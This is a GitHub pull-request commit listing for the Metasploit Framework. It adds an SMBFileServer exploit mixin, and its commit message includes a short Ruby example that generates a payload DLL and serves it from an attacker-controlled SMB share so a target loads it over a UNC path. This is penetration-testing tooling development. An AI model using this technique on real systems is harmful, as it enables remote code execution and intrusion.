New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Implement SMBFileServer mixin. #3075
Commits on Mar 7, 2014
-
Implement SMBFileServer mixin.
In order to accomplish remote file injection (e.g. DLL) this module emulates an SMB service process to allow clients to load a file from a network share. This commit implements the SMBFileServer exploit module utilising the ::Rex::Proto::SMB::Server module to export the "start_smb_server" function. Utilising the module (example): include Msf::Exploit::Remote::SMBFileServer exe = generate_payload_dll @exe_file = rand_text_alpha(7) + ".dll" @share = rand_text_alpha(5) my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] @unc = "\\#{my_host}\#{@share}\#{@exe_file}" start_smb_server(@unc, exe, @exe_file) // Inject DLL handle A separate commit will provide a sample implementation of utilising this module within a generic webserver DLL injection exploit: ./exploits/windows/http/generic_http_dllinject.rb
Matthew Hall committedMar 7, 2014 Configuration menu - View commit details
-
Copy full SHA for 88df736 - Browse repository at this point
Copy the full SHA 88df736View commit details
Commits on Mar 12, 2014
-
Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7.
* Doc comments wrap at 78 chars to follow yardoc convention * Remove unused :server and SERVER vals * Use Utils class directly * Stop server within an ensure * Change SRVHOST to an OptAddress
Matthew Hall committedMar 12, 2014 Configuration menu - View commit details
-
Copy full SHA for 88d06c6 - Browse repository at this point
Copy the full SHA 88d06c6View commit details -
Add yardoc documentation for Msf::Exploit::Remote::SMBFileServer
Matthew Hall committedMar 12, 2014 Configuration menu - View commit details
-
Copy full SHA for fe02ba5 - Browse repository at this point
Copy the full SHA fe02ba5View commit details -
Add example usage to Msf::Exploit::Remote::SMBFileServer documentation
Matthew Hall committedMar 12, 2014 Configuration menu - View commit details
-
Copy full SHA for eaf908c - Browse repository at this point
Copy the full SHA eaf908cView commit details
Commits on Feb 17, 2015
-
Configuration menu - View commit details
-
Copy full SHA for a4c6e42 - Browse repository at this point
Copy the full SHA a4c6e42View commit details -
Matthew Hall committed
Feb 17, 2015 Configuration menu - View commit details
-
Copy full SHA for 6c68f0a - Browse repository at this point
Copy the full SHA 6c68f0aView commit details -
Implement SMBFileServer mixin.
In order to accomplish remote file injection (e.g. DLL) this module emulates an SMB service process to allow clients to load a file from a network share. This commit implements the SMBFileServer exploit module utilising the ::Rex::Proto::SMB::Server module to export the "start_smb_server" function. Utilising the module (example): include Msf::Exploit::Remote::SMBFileServer exe = generate_payload_dll @exe_file = rand_text_alpha(7) + ".dll" @share = rand_text_alpha(5) my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST'] @unc = "\\#{my_host}\#{@share}\#{@exe_file}" start_smb_server(@unc, exe, @exe_file) // Inject DLL handle A separate commit will provide a sample implementation of utilising this module within a generic webserver DLL injection exploit: ./exploits/windows/http/generic_http_dllinject.rb
Matthew Hall committedFeb 17, 2015 Configuration menu - View commit details
-
Copy full SHA for 8beed56 - Browse repository at this point
Copy the full SHA 8beed56View commit details -
Tidy lib/msf/core/exploit/smb.rb following feedback from jlee-r7.
* Doc comments wrap at 78 chars to follow yardoc convention * Remove unused :server and SERVER vals * Use Utils class directly * Stop server within an ensure * Change SRVHOST to an OptAddress
Matthew Hall committedFeb 17, 2015 Configuration menu - View commit details
-
Copy full SHA for 5cf8833 - Browse repository at this point
Copy the full SHA 5cf8833View commit details -
Add yardoc documentation for Msf::Exploit::Remote::SMBFileServer
Matthew Hall committedFeb 17, 2015 Configuration menu - View commit details
-
Copy full SHA for cec8179 - Browse repository at this point
Copy the full SHA cec8179View commit details -
Add example usage to Msf::Exploit::Remote::SMBFileServer documentation
Matthew Hall committedFeb 17, 2015 Configuration menu - View commit details
-
Copy full SHA for 9e2a483 - Browse repository at this point
Copy the full SHA 9e2a483View commit details -
Matthew Hall committed
Feb 17, 2015 Configuration menu - View commit details
-
Copy full SHA for 547d4d1 - Browse repository at this point
Copy the full SHA 547d4d1View commit details -
Merge branch 'module-exploitsmbfileserver' of github.com:0x41414141/m…
…etasploit-framework into module-exploitsmbfileserver
Matthew Hall committedFeb 17, 2015 Configuration menu - View commit details
-
Copy full SHA for d4aa444 - Browse repository at this point
Copy the full SHA d4aa444View commit details